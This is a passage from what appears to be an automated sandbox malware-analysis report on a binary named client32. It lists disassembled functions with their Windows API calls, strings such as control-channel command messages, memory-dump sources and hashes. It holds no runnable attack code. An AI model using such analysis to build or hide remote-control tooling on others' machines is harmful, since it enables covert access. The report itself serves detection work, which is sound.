                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1921910413-0
                                                                                                                                    • Opcode ID: 9eebe54c98b848111fc2ee340d6e07afed2adb92d9e37135a46ceadea0f5dd96
                                                                                                                                    • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                                                                                    • Opcode Fuzzy Hash: 9eebe54c98b848111fc2ee340d6e07afed2adb92d9e37135a46ceadea0f5dd96
                                                                                                                                    • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                                                                    • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                                                                    • %02x, xrefs: 11081610
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf
                                                                                                                                    • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                                                                    • API String ID: 2111968516-476189988
                                                                                                                                    • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                                                    • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                                                                    • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                                                    • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111442D0 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000000,?,762DC740), ref: 111442F0
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144303
                                                                                                                                    • GetFileVersionInfoSizeA.VERSION(?,?), ref: 11144323
                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                    • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 1114434D
                                                                                                                                    • VerQueryValueA.VERSION(?,1119A5BC,?,?,?,?,00000000,00000000,?), ref: 1114438E
                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$HeapInfoModuleVersion$AllocateErrorFreeHandleLastNameQuerySizeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1506823308-0
                                                                                                                                    • Opcode ID: b688c16def8b645aa007769c5559b4416277e7eb52f4bfe7b86313bc47a47bad
                                                                                                                                    • Instruction ID: 533d070b008c48d0019e4fafecd2d90481fbd6e663e37e79b598d21e300b118d
                                                                                                                                    • Opcode Fuzzy Hash: b688c16def8b645aa007769c5559b4416277e7eb52f4bfe7b86313bc47a47bad
                                                                                                                                    • Instruction Fuzzy Hash: 242161769001299BDB14DF64DC44EDEF3BCEF58714F004199E94997200DAB1AE94CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111F516
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteObject$PaletteSelect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2820294704-0
                                                                                                                                    • Opcode ID: 3f522e6c8faa98df4d8825fdb436005541d0870e914f9d973299dc4dd91eea3f
                                                                                                                                    • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                                                                    • Opcode Fuzzy Hash: 3f522e6c8faa98df4d8825fdb436005541d0870e914f9d973299dc4dd91eea3f
                                                                                                                                    • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111203A0 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 111203B7
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 111203C5
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 111203DD
                                                                                                                                    • DestroyCaret.USER32 ref: 11120427
                                                                                                                                    • GetTextMetricsA.GDI32(?,?), ref: 1112043A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CaretCreateDeleteDestroyFontIndirectMetricsSelectText
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3157017215-0
                                                                                                                                    • Opcode ID: 9616a6df07214044c73fe254ae911cd33ae5b13f194545ba98b85c84a9e919cd
                                                                                                                                    • Instruction ID: 8dff65c09a1557b696c85e9e25c6311fcf634728ba3d8a527a514e8d98d4d363
                                                                                                                                    • Opcode Fuzzy Hash: 9616a6df07214044c73fe254ae911cd33ae5b13f194545ba98b85c84a9e919cd
                                                                                                                                    • Instruction Fuzzy Hash: EE31F4709047949FC319CF74D1947AAFFE9EF49309F54856EE4AE8A281DB35A542CB00
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100B340 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                                                                      • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                                                                      • Part of subcall function 1100A250: DeviceIoControl.KERNEL32 ref: 1100A298
                                                                                                                                      • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                                                                      • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                                                                      • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                                                                    • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Enter$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3652779745-0
                                                                                                                                    • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                                    • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                                                                    • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                                    • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100A250 Relevance: 7.5, APIs: 5, Instructions: 47synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                                                                    • DeviceIoControl.KERNEL32 ref: 1100A298
                                                                                                                                    • GetLastError.KERNEL32 ref: 1100A2A0
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseControlCreateDeviceErrorEventHandleLastObjectSingleWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2062450601-0
                                                                                                                                    • Opcode ID: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
                                                                                                                                    • Instruction ID: bc93eed9d268af17b12dc0c75b84aef517d95988fbcc1729b49ee65d4685203d
                                                                                                                                    • Opcode Fuzzy Hash: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
                                                                                                                                    • Instruction Fuzzy Hash: F601F731A40629B7F7159AA8CC45F9DB768AB44775F204320F934A76C0C770A94187D4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1101B530 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 204libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018915,20F29797,?,?,?,1117EE88,000000FF), ref: 110DEB61
                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                    • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                                                                    Strings
                                                                                                                                    • NSSecurity.dll, xrefs: 1101B7A3
                                                                                                                                    • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                                                                    • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterLibraryLoadSectionwsprintf
                                                                                                                                    • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                                                                    • API String ID: 3649214924-1044166025
                                                                                                                                    • Opcode ID: 2e52bf2c99c1d6dd3e4e2177ce2ea0f5ff12decaa1ec60b8a43dd0183d24a500
                                                                                                                                    • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                                                                    • Opcode Fuzzy Hash: 2e52bf2c99c1d6dd3e4e2177ce2ea0f5ff12decaa1ec60b8a43dd0183d24a500
                                                                                                                                    • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1113C3C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsWindow.USER32(00000000), ref: 1113C451
                                                                                                                                    • SendMessageTimeoutA.USER32(00000000,0000004A,00010488,00000003,00000002,00002710,?), ref: 1113C56F
                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFreeHeapLastMessageSendTimeoutWindow
                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                    • API String ID: 1325694376-2270926670
                                                                                                                                    • Opcode ID: f5b2c6c5781073486aca12cb7a6af53d8c92ab2d874e06493356e311be6ff0f9
                                                                                                                                    • Instruction ID: a2dd537b469b56fd0a393197ec2e6fa62d94d6918f16b8d23f7c7785d4e9094b
                                                                                                                                    • Opcode Fuzzy Hash: f5b2c6c5781073486aca12cb7a6af53d8c92ab2d874e06493356e311be6ff0f9
                                                                                                                                    • Instruction Fuzzy Hash: 5D51C134A0120AAFDB00DF94DD81FEEF7B9EF89718F104125F915A7284E771AA04CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11110530 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,20F29797,?,?), ref: 11110564
                                                                                                                                    • SetEvent.KERNEL32(?), ref: 111105C9
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 11110604
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
